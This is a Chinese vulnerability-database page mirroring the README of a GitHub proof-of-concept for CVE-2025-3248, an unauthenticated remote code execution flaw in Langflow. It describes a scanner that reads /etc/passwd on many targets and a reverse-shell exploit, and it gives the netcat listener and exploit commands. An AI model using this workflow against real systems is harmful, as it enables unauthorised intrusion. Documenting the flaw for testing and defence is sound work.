漏洞平台

POC详情： ae9c93aa3307fad013efffdd37bef531a76a1dc5

来源

https://github.com/r0otk3r/CVE-2025-3248

关联漏洞

标题： Langflow 安全漏洞 (CVE-2025-3248)
描述：Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞，该漏洞源于/api/v1/validate/code端点存在代码注入漏洞，可能导致远程未经验证的攻击者执行任意代码。

介绍

# CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)

This repository contains two Python scripts:
- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.

## Summary

**CVE-2025-3248** is a critical vulnerability in Langflow AI that allows **unauthenticated attackers** to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.

---

## Files

### `LangflowCheck.py`

- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.

### `exploit.py`

- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.

---

## Usage

### 1. Install Requirements
```bash
pip install -r requirements.txt
```
### 2. Run Vulnerability Scanner
Single URL
```bash
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
````
![1](https://github.com/user-attachments/assets/ef572e83-21ad-4661-86b0-9c575e092ba0)

Multiple Targets
```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```
![tt](https://github.com/user-attachments/assets/76133300-41fa-4b1f-8722-24186b8add20)


### 3. Exploit a Target

First, start a listener
```bash
sudo nc -nvlp 4444
```
![l](https://github.com/user-attachments/assets/6e3e3275-d5a7-4aad-a148-3cb48fcd7103)

Then, run the exploit:
```bash
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
```
![2](https://github.com/user-attachments/assets/6d24cf8d-8a15-4844-9794-d9d91de80218)


You should receive a shell if the target is vulnerable.
![root](https://github.com/user-attachments/assets/291a630e-ab53-4ab3-92e3-c1ac973e377c)


## ⚠️ Disclaimer

This exploit is for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.

---

## Official Channels

- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)

文件快照


 [4.0K]  /data/pocs/ae9c93aa3307fad013efffdd37bef531a76a1dc5
├── [3.3K]  exploit.py
├── [3.3K]  LangflowCheck.py
└── [2.2K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。